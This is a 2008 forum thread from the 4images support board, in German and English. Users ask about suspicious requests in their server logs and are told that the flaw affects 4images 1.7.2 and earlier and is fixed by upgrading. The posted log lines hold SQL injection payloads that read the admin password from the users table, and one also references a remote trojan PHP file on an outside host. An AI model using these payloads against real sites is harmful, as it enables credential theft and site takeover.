4images Forum & Community

4images Issues / Ausgaben => Discussion & Troubleshooting => Topic started by: rubberduck on April 15, 2008, 05:14:16 PM

Title: Hacking?
Post by: rubberduck on April 15, 2008, 05:14:16 PM

Was soll man davon halten? Ist da was bekannt?

Code: [Select]

/search_user=x%2527%20union%20select%20user_password%20from%204images_users%20where%20user_name=%2527ADMINhttp://dssigorta.com.tr/Q8Trojan.php
Wurde zwar als 404 gefiltert, aber evtl. hat ja jemand Infos dazu.

Title: Re: Hacking?
Post by: kai on April 15, 2008, 05:19:07 PM

Bei 4images < = 1.7.2 war das ein Fehler.
Mit der aktueller Version, bist du auf der sicheren Seite:
http://www.4homepages.de/4images/download.php

Title: Re: Hacking?
Post by: rubberduck on April 15, 2008, 05:20:46 PM

Danke für die Info. Dann dürfte 174 ja reichen.

Title: Re: Hacking?
Post by: musicalcat on July 12, 2008, 07:54:14 PM

Hi. I have a question, what does it mean when I get this in my website stats:

Quote

http://www..../4images/search.php?search_user=x%2527%20union%20select%20user_password%20from%204images_users%20where%20user_name=%2527catasa

I did a search on this forum for any info, and I only got this thread as a result.

Title: Re: Hacking?
Post by: † manurom on July 12, 2008, 09:18:45 PM

Hello;
it seems that a hacker tries to use and old SQL injection exploit, using this kind of source:

Code: [Select]

/*
CODE REMOVED by Nicky
/*
If you use the last version of 4images, you should not be afraid.
I use to see such requests in my own website stats. Don't know why people are so stupid :roll:. I prefer to spend my time helpng others.

[edit by Nicky]
code removed due we know why ;)

[edit by manurom]
thanks, Nicky. I forgot that some members still use old versions. Sorry :oops:.

Title: Re: Hacking?
Post by: musicalcat on July 12, 2008, 10:08:44 PM

Thank you for your help. I installed the latest version this week. :)